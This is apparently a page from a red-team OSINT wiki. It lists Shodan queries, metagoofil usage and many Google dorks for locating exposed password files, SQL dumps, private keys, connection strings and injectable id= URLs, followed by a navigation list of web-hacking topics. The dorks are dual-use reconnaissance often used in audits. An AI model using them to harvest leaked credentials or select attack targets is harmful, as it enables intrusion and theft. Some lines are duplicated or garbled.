http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24

Twitter / GitHub

# install
git clone https://github.com/opsdisk/metagoofil
cd metagoofil
pip install -r requirements.txt

# usage
python3 metagoofil.py -d domain.com -t doc -l 50 -n 50 -o /tmp/result -f /tmp/result/result.html -u

intitle:"index of" "*.php"
intitle:"index of" "*.py"
intitle:"index of" "*.sh"
intitle:"index of" "schema.sql"
inurl: database

inurl:php?=id1
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num= andinurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=

inurl:admin filetype:xls
intitle:"index of" "/mysql"
site:.edu intext:"index of" "payroll"
inurl:edu “login”

intext:”budget approved”) inurl:confidential
ext:inc "pwd=" "UID="
ext:ini intext:env.ini
ext:ini Version=... password
ext:ini Version=4.0.0.4 password
ext:ini eudora.ini
ext:ini intext:env.ini
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb   inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
filetype:asp   DBQ=" * Server.MapPath("*.mdb")
filetype:asp "Custom Error Message" Category Source
filetype:asp + "[ODBC SQL"
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:asp DBQ=" * Server.MapPath("*.mdb") 
filetype:asp “Custom Error Message” Category Source
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:bak inurl:"htaccess|passwd|shadow|htusers" 
filetype:conf inurl:firewall -intitle:cvs 
filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals
filetype:dat "password.dat
filetype:dat "password.dat" 
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" 
filetype:eml eml +intext:”Subject” +intext:”From” +intext:”To”
filetype:inc dbconn 
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect 
filetype:log inurl:"password.log"
filetype:log username putty PUTTY SSH client logs can reveal usernames
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:mdb inurl:users.mdb
filetype:ora ora
filetype:ora tnsnames
filetype:pass pass intext:userid
filetype:pdf "Assessment Report" nessus
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" 
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg +intext:”defaultusername” +intext:”defaultpassword”
filetype:reg reg HKEY_ Windows Registry exports can reveal
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql ("passwd values" | "password values" | "pass values" ) 
filetype:sql ("values * MD" | "values * password" | "values * encrypt") 
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:sql password 
filetype:sql “insert into” (pass|passwd|password)
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:url +inurl:"ftp://" +inurl:";@" 
filetype:url +inurl:”ftp://” +inurl:”;@”
filetype:xls inurl:"email.xls"
filetype:xls username password email
index of: intext:Gallery in Configuration mode
index.of passlist
index.of perform.ini mIRC IRC ini file can list IRC usernames and
index.of.dcim 
index.of.password 
intext:" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
intext:"#mysql dump" filetype:sql
intext:"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
intext:"A syntax error has occurred" filetype:ihtml
intext:"ASP.NET_SessionId" "data source="
intext:"About Mac OS Personal Web Sharing"
intext:"An illegal character has been found in the statement" -"previous message"
intext:"AutoCreate=TRUE password=*"
intext:"Can't connect to local" intitle:warning
intext:"Certificate Practice Statement" filetype:PDF | DOC
intext:"Certificate Practice Statement" inurl:(PDF | DOC)
intext:"Copyright (c) Tektronix, Inc." "printer status"
intext:"Copyright © Tektronix, Inc." "printer status"
intext:"Emergisoft web applications are a part of our"
intext:"Error Diagnostic Information" intitle:"Error Occurred While"
intext:"Error Message : Error loading required libraries."
intext:"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
intext:"Fatal error: Call to undefined function" -reply -the -next
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Generated   by phpSystem"
intext:"Generated by phpSystem"
intext:"Host Vulnerability Summary Report"
intext:"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
intext:"IMail Server Web Messaging" intitle:login
intext:"Incorrect syntax near"
intext:"Index of" /"chat/logs"
intext:"Index of /network" "last modified"
intext:"Index of /" +.htaccess
intext:"Index of /" +passwd
intext:"Index of /" +password.txt
intext:"Index of /admin"
intext:"Index of /backup"
intext:"Index of /mail"
intext:"Index of /password"
intext:"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
intext:"Microsoft CRM : Unsupported Browser Version"
intext:"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
intext:"Network Host Assessment Report" "Internet Scanner"
intext:"Network Vulnerability   Assessment Report"
intext:"Network Vulnerability Assessment Report"
intext:"Network Vulnerability Assessment Report" 本文来自 pc007.com
intext:"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
intext:"Thank you for your order"   +receipt
intext:"Thank you for your order" +receipt
intext:"Thank you for your purchase" +download
intext:"The following report contains confidential information" vulnerability -search
intext:"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
intext:"phpMyAdmin MySQL-Dump" filetype:txt
intext:"phpMyAdmin" "running on" inurl:"main.php"
intextpassword | passcode)   intextusername | userid | user) filetype:csv
intextpassword | passcode) intextusername | userid | user) filetype:csv
intitle:"index of" +myd size
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" master.passwd 007电脑资讯
intitle:"index of" members OR accounts
intitle:"index of" mysql.conf OR mysql_config
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" spwd
intitle:"index of" user_carts OR user_cart
intitle:"index.of *" admin news.asp configview.asp
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:(“TrackerCam Live Video”)|(“TrackerCam Application Login”)|(“Trackercam Remote”) -trackercam.com
inurl:admin inurl:userlist Generic userlist files

device:firewall 
device:router 
device:wap 
device:webcam 
device:media 
device:"broadband router" 
device:pbx 
device:printer 
device:switch 
device:storage 
device:specialized 
device:phone 
device:"voip" 
device:"voip phone" 
device:"voip adaptor" 
device:"load balancer" 
device:"print server" 
device:terminal 
device:remote 
device:telecom 
device:power 
device:proxy 
device:pda 
device:bridge

RED Squad [en]

/home/red-squad

whoami

Recently Added

July 2024

Is There Life After Death ?

After compromising an infrastructure, web app, what is next ?

Web Hacking

CTFs shortcuts

Find flag

Web Dev

Audits plan

External Audit - Plan

External Audit - Plan

Search Engines

Metasearch Engines and Search Engines:

Online Services

Breaches/Leaks

🗣️ Breaches/Leaks

🗣 Breaches

TOR network

Search in the TOR Network

Services

Source Code

Services:

Vulnerabilities and IOC

Find Vulnerability Data and Indicators of Compromise

Services

MISC

Telegram OSINT

Enumeration

Web Scanners

nikto

Usage

Whatweb

PortSwigger's Burp Suite

OWASP ZAP

Subdomains

Enumeration

Google

HTTP Stuff

403 Bypass

Install

Check also

HTTP Parameters

Find Parameters

Arjun

ParamSpider

Parameter Pollution

Sessions / Tokens

Cookies

JWT

Brief

Attacking JWT

Aim

Injections

LaTex

What is LaTex ?

Injections

Read files

Write file

Command execution

Cross-Site Scripting

Resources

Web Vulnerabilities

CSRF

How does it work?

Key points about CSRF:

How to prevent CSRF attacks?

Files / Upload

ZIP Slip

Exploitation

IDOR

Servers / CMS

CMSMap

Tomcat

No Account

Default Credentials

Drupal

Manual

`whoami`